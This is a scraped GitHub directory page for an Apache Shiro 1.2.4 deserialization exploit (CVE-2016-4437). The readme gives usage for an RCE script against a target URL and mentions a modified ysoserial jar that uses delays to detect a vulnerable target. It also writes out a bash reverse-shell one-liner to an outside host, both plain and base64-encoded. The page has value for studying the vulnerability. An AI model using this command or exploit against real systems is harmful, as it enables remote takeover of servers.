Name		Name	Last commit message	Last commit date
parent directory ..
image		image
readme.md		readme.md
shiro-1.2.4_rce.py		shiro-1.2.4_rce.py
ysoserial-sleep.jar		ysoserial-sleep.jar

readme.md

Readme

Apache Shiro

Shiro 1.2.4 [点击展开]

使用延时判断key和gadget，目标不出网也可以检测是否存在漏洞
修改了ysoserial支持延时命令，不要使用原版的ysoserial

+-------------------------------------------------------------------------------------------------------+
+ DES: By zhzyker as https://github.com/zhzyker/exphub                                                  +
+      Vuln Name: CVE-2016-4437 | Shiro 550  |  Shiro 1.2.4                                             +
+                                                                                                       +
+      Nc shell need encode command: https://www.jackson-t.ca/runtime-exec-payloads.html                 +
+      Original: bash -i >&/dev/tcp/1.1.1.1/233 0>&1                                                    +
+      Encoding: bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvMjMzIDA+JjE=}|{base64,-d}|{bash,-i}  +
+-------------------------------------------------------------------------------------------------------+
+ USE: python3 <filename> <url>                                                                         +
+ EXP: python3 shiro-1.2.4_rce.py https://1.1.1.1:8080                                                   +
+ VER: Apahce Shiro <= 1.2.4                                                                            +
+-------------------------------------------------------------------------------------------------------+

Linux系统使用base64编码发送命令，Windows发送默认字符
利用示例：

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

shiro

shiro

readme.md

Readme

Files

shiro

Directory actions

More options

Directory actions

More options

Latest commit

History

shiro

Folders and files

parent directory

readme.md

Readme